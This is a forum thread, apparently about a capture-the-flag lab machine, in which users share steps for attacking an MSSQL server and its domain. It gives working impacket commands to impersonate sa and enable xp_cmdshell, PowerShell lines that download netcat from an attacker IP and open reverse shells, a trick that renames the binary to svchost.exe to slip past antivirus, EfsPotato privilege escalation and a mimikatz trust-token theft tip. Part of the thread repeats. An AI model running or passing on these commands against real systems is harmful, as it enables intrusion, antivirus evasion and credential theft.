[jsvensson]

From mssql this is unintended way. Anybody know intended?

[a44857437]

I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably?

how did u get a shell?

I used mssqlclient, use_link [PRIMARY] and exec_sa_login (it is described in the thread somewhere) then enabled xp_cmdshell and ran a reverse shell

---

From mssql this is unintended way. Anybody know intended?

No, but I guess it involves ADFS in some way...

[Dumbdev]

stuck with mssqlclient - all cmd entered only return in error and kill the impacket client... anyone else have same issues?

there you go

enum_links

use_link [PRIMARY]

use master

exec_as_login sa

enable_xp_cmdshell

xp_cmdshell "whoami"

[maggi]

xp_cmdshell "echo IWR http://10.10.xx.xx:8000/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile"

xp_cmdshell "%TEMP%\nc.exe 10.10.xx.xx6666 -e powershell.exe"

although I used my own nc, idk how the one with kali works....

[osamy7593]

guys after mssql what to do

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Leonzola]

where is the root and user flag


C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 161D-1BB7

Directory of C:\Users\Administrator\Desktop

07/10/2024 04:19 AM <DIR> .
07/03/2024 08:55 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,519,295,488 bytes free

You're not done

[jsvensson]

How the hell bypass av to get meterpreter or other wat to get nt-authority?

[osamy7593]

guys use efs potato to get system

https://github.com/zcgonvh/EfsPotato --> move EfsPotato.cs to the target machine

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

./EfsPotato.exe 'whoami'

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[bmoon10]

How the hell bypass av to get meterpreter or other wat to get nt-authority?

after alot of trying this worked for me

EXEC xp_cmdshell 'mkdir %TEMP%\mydir';

xp_cmdshell "echo IWR http://10.10.xx.xx/nc64.exe -Outfile %TEMP%\mydir\svchost.exe | powershell -noprofile"
xp_cmdshell "%TEMP%\mydir\svchost.exe 10.10.x.xx 4444 -e powershell.exe"

nc.exe certainly works too. download the nc.exe to c:\users\public\documents. for some reason windows defender doesn't flag nc.exe

[a44857437]

I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably?

how did u get a shell?

I used mssqlclient, use_link [PRIMARY] and exec_sa_login (it is described in the thread somewhere) then enabled xp_cmdshell and ran a reverse shell

---

From mssql this is unintended way. Anybody know intended?

No, but I guess it involves ADFS in some way...

what did u run to get the reverse shell tho cuz everything i have tried ether gets blocked or just doesn't workl

I cobbled together a powershell rev shell where I masked a number of calls and modules with '*' so they are not really visible to AV anymore

---

where is the root and user flag


C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 161D-1BB7

Directory of C:\Users\Administrator\Desktop

07/10/2024 04:19 AM <DIR> .
07/03/2024 08:55 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,519,295,488 bytes free

If you got here through the rev shell via mssql server, you're on the PRIMARY machine (part of corp.ghost.htb), the flags are on dc01, you have to abuse the trust and steal the trust token with mimikatz